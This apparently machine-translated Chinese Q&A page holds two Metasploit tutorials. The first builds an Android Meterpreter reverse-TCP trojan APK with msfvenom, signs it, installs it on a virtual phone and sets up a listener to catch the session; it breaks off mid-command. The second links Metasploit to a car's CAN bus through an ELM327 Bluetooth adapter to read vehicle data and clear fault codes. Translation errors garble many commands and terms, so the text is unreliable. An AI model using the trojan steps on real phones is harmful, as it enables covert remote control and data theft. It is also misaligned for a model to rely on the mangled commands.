2016 - 2024

感恩一路有你

kali linux怎么启动metasploit 为什么有人说安卓系统不安全?

浏览量:4863 时间:2023-05-07 07:31:25 作者:采采

为什么有人说安卓系统不安全?

谢谢邀请~ ~

众所周知,手机操作系统的两大巨头:安卓和苹果。由于Android是开源系统,流畅度和安全性成为用户经常吐槽的话题,流畅度可以从使用中得到验证。那么为什么安全性比苹果 s系统?我们怎么知道?现在边肖将带你验证安卓手机的安全性。

和往常一样,仍然需要使用kali系统下集成的metasploit工具生成木马。1.打开kali,输入命令【MSF venom-p Android/meter preter/reverse _ TCP lhost "IP "lport "卡利系统的港口可以自由设置,但不 不要将其设置为固定端口号aaa.apk "。安卓手机的安卓包都是以apk结尾的,所以应该会生成以apk结尾的文件。

如果出现如下所示的信息,说明木马文件已经生成,可以从根目录找到aaa.apk文件。

然后,您需要创建特洛伊木马文件的证书和数字签名。因为边肖没有学过Android开发,我只是知道安装Android软件需要这两样东西,所以我可以 不要向题主和读者解释它们。请原谅我。

2.通过命令【keytool-genkey-v-keystore-alias AAA-keyalg RSA-keysize 1024-validity 999】创建一个证书。

然后配置相关信息,确认证书信息。

3.【Jarsigner-verbose-sigalgsha 1 with RSA-digestalgsha 1-keystore AAAA . apk AAA】,创建数字签名。

为了保证木马可以在大部分安卓手机上安装运行,需要对木马文件进行优化。4.首先安装zipalign工具,安装命令是【apt-get install zipalign】。

然后就可以优化木马文件了。命令是[zipalign -v 4 aaa.apk aaaa.apk],如果出现错误消息,可以忽略。

5、打开安卓虚拟机,边肖用把木马文件传到虚拟机,暂时没有安装。

6.用【使用exploit/multi/handler】加载攻击模块,用【设置有效载荷Android/米Preter/Reverse _ TCP】选择有效载荷模块。

然后在Android虚拟机中安装木马文件并运行。

7.返回kali系统,执行攻击命令【

如何使用Metasploit进行汽车安全性测试?

步骤1:获得OBD II连接器硬件。

首先,我们有一个可以连接到汽车ODC II连接器的设备。这里我选择相对便宜的ODB II ELM327蓝牙迷你接口。亚马逊上的价格是8.49美元,它可以有效地与汽车的CAN网络进行通信,并使用M: "。

第二步:安装串口。

CAN协议是串行协议,所以我们需要安装rubygem "串行端口 "。

kali gem安装串行端口

步骤3:连接蓝牙适配器

接下来,我们需要连接我们的蓝牙适配器,以便与我们汽车中的ELM 327适配器进行通信。

要连接到ELM 327设备,我们需要获取它的MAC地址。我们可以通过使用内置的HCTooltool扫描蓝牙设备来获取MAC地址。

碱性酒精扫描

根据扫描结果,我这里的MAC地址是00 : 19 : 6 de CHO 5-@ . com 36 : 4 a: 9d。

现在,我们使用这个MAC地址发送我们的蓝色牙科适配器连接到ELM 327设备。注意:请将MAC地址用双引号括起来,如下所示。

kali rfcomm connect/dev/rfcomm 1 00 : 19 : 6 d: 36 : 4 a: 9d

步骤4:运行ELM 327中继

下一步是运行ELM 327中继,以便Metasploit可以与ELM 327芯片组通信。您可以在/usr/share/metasploit-framework/tools/hardware目录中找到它。

kali CD/usr/share/metasploit-framework/tools/hardware kali ls-l

在运行它之前,让 让我们看看它的帮助信息。

kali ruby elm327_relay.rb -h

可以看到,我们只需要设置两个参数;速度(默认为115200)和串行设备(默认为/dev/ttyub0)。这里的串行设备可以通过dmesg | greptys *命令来确定。

现在,使用串行设备运行elm327继电器,并将速度保持在默认值,如下所示。

kali ruby elm 327 _ relay . r b-s/dev/ttys 0第五步:启动Metasploit。

现在我们已经配置了Kali Linux来与ELM 327设备通信,我们需要创建一个到Metasploit的硬件桥。Metasploit是为TCP/IP通信而构建的,现在我们需要它通过串口与汽车的原生CAN协议进行通信。

首先,我们启动Metasploit。

卡利msfconsole

然后,搜索汽车模块。

卡利搜索汽车

如你所见,汽车模块很少,功能也很有限。

我们选择使用辅助/客户端/hwbridge/connect模块。

msf使用辅助/客户端/hwbridge/connect

加载模块后,我们可以输入info命令来获取关于模块的详细信息。

卡利信息

最后,让 让我们执行这个模块。

Msf利用步骤6:使用Metasploit汽车模块。

现在,我们已经在车辆中创建了Metasploit和C。协议之间的硬件桥。所以我们可以开始使用Metasploit中的car模块。

例如,您想要检索车辆信息。

msf使用post/硬件/汽车/getvinfo

该模块将查询并收集所有车辆故障诊断码(DTC)和其他信息,如速度、冷却液温度、车辆识别号(VIN ),甚至清除DTC。

现在,我们可以将我们的Linux系统和Metasploit框架直接连接到车载网络,直接与车载设备进行通信!

Metasploit 汽车 信息 设备 模块

版权声明:本文内容由互联网用户自发贡献,本站不承担相关法律责任.如有侵权/违法内容,本站将立刻删除。